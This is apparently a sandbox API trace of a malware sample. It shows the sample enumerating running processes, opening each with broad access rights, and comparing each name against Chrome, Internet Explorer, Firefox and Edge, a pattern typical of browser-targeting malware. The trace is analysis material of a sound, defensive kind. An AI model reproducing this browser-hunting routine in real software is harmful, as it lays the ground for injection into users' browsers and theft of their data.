	[0220.999] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.999] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0220.999] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4f4c
	[0221.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.000] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0221.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.000] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.000] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0221.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.001] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.001] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.001] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4f50
	[0221.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.002] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.002] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.002] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.002] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.003] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0221.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4f54
	[0221.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.003] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.004] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.004] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.004] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.005] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0221.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4f58
	[0221.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.006] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0221.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.006] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.007] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0221.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.007] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.007] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4f5c
	[0221.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.008] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.008] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.009] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.009] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.009] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0221.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4f60
	[0221.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.010] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0221.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.010] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.011] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0221.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.011] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.011] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0221.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4f64
	[0221.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.012] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0221.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.012] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.013] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0221.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.013] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.013] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0221.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4f68
	[0221.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.014] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0221.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.014] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.015] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0221.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.015] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.015] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0221.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4f6c
	[0221.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.016] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0221.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.016] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.017] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0221.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.017] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.017] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0221.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0221.018] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0221.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4f70
	[0221.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.019] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0221.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.019] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.020] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0221.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.020] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.021] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0221.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4f74
	[0221.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.022] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0221.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.022] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.023] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0221.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.023] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.023] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0221.024] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4f78
	[0221.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.024] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0221.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.024] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.025] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0221.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.025] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.025] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0221.026] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4f7c
	[0221.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.026] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0221.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.026] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.027] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0221.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.027] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.027] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0221.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4f80
	[0221.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.028] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0221.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.029] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.029] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0221.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.030] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.030] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0221.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4f84
	[0221.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.031] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0221.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.031] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.032] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0221.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.032] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.032] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0221.033] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4f88
	[0221.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.033] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0221.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.033] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.034] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0221.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.034] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.034] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0221.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4f8c
	[0221.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.035] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0221.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.036] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.036] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0221.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.037] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.037] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0221.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4f90
	[0221.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.038] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0221.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.038] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.038] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0221.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.039] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.040] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0221.041] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4f94
	[0221.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.041] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0221.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.041] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.041] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0221.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.042] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.042] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0221.043] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4f98
	[0221.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.043] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0221.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.043] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.044] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0221.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.044] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.044] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0221.045] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4f9c
	[0221.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.045] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0221.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.046] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.046] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0221.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.047] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.047] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0221.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4fa0
	[0221.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.048] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0221.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.049] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.049] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0221.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.050] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.050] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0221.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4fa4
	[0221.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.051] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0221.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.051] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.052] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0221.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.053] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.053] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0221.054] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4fa8
	[0221.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.054] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0221.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.055] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.055] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0221.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.056] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
